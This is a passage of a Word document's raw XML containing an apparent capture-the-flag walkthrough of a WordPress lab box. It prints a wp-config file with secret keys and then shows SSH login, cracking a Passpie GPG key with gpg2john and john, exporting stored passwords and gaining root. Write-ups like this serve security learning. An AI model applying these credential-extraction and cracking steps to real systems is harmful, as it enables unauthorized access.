      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'FTP_BASE'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'blog/'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'FTP_SSL'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);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/**#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AnnotationTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@+</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Authentication Unique Keys and Salts.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"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@since</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.6.0</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'AUTH_KEY'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'?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n&gt;+3m?.B/:'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'SECURE_AUTH_KEY'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'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'LOGGED_IN_KEY'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   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'J+mxCaP4z&lt;g.6P^t`ziv&gt;dd}EEi%48%JnRq^2MjFiitn#&amp;n+HXv]||E+F~C{qKXy'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'NONCE_KEY'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'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'AUTH_SALT'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'[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*&lt;~:0]s}d&lt;&amp;M;.,x0z~R&gt;3!D'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'SECURE_AUTH_SALT'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'&gt;`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&amp;~omiH^jVC?2-I?I.'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'LOGGED_IN_SALT'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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&amp;^JsI`M)FJTJEVI) N#NOidIf='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'NONCE_SALT'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      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'.sU&amp;CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL'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);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/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* WordPress Database Table prefix.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$table_prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'wp_'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/**</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * For developers: WordPress debugging mode.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"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@link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https://wordpress.org/support/article/debugging-in-wordpress/</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'WP_DEBUG'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therTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Absolute path to the WordPress directory. */</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"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therTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">defined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'ABSPATH'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(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'ABSPATH'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__DIR__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> . 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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Other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/** Sets up WordPress vars and included files. */</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">require_once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ABSPATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'wp-settings.php'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There is a lot of hashes in there but the interesting thing is that we have a method:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">FTP, the user and the password (hashed). We already tried to connect to ftp and we</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">couldn't so maybe this could prove useful.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="getting-the-credentials"/>
      <w:r>
        <w:t xml:space="preserve">Getting the credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp 10.10.11.186</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So we will do that:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh jnelson@metapress.htb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We input the password and we can see that it works!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Now we can do an ls and find out that there is the user.txt file with the flag that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we want.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="escalating-the-privileges"/>
      <w:r>
        <w:t xml:space="preserve">Escalating the privileges</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If we try to use sudo we will see that we cannot. However we can see that there is a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.passpie directory. Passpie is a password manager for Linux and there is a .keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">file inside and a ssh directory. We don't really know if we can use this but it is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">worth a try.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So we will copy the private key block of the .keys file to our machine and write it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to a file called key. And use gpg2john to write it to another file unhashed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gpg2john key &gt; pass_hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And run it through john again:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">john</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> --wordlist=/usr/share/wordlists/rockyou.txt pass_hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And once it is done:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">john</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> --wordlist=/usr/share/wordlists/rockyou.txt pass_hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now we can see that the password is "blink182". We don't know what this is for but</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we can find out using:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">passpie export pass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And entering "blink182" as the Passphrase. Now we can see that the root user has</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">'p7qfAZt4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">A1xo0x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">' as password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So we will:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">su root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#+begin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">quote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nil#+end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">quote</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And enter that as the password and we are in! We are root!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So let's end this, let's go to /root/root.txt and extract our flag from there.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And that is it! I hope this was informative, I am still a noob but I had a great</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">time trying to crack this.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mnt/c/Users/Federico/Pictures/Screenshots/tes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hyperlink" Id="rId22" Target="http://metapress.htb/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId26" Target="http://metapress.htb/wp-admin" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId28" Target="https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447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metapress.htb/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId26" Target="http://metapress.htb/wp-admin" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId28" Target="https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447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 Two</dc:title>
  <dc:creator>Federico Pontoriero</dc:creator>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-02T05:23:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-02T05:23:28Z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